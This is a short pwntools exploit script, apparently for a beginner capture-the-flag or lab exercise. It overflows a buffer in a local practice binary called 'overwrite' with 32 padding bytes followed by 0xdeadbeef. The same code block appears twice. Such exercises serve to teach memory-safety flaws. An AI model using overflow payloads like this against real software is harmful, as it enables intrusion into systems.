exploit.py
from pwn import *
# Start program
io = process('./overwrite')
# Send string to overflow buffer
io.sendlineafter(b'?', b'A' * 32 + p32(0xdeadbeef))
# Receive output
print(io.recvall().decode())
from pwn import *
# Start program
io = process('./overwrite')
# Send string to overflow buffer
io.sendlineafter(b'?', b'A' * 32 + p32(0xdeadbeef))
# Receive output
print(io.recvall().decode())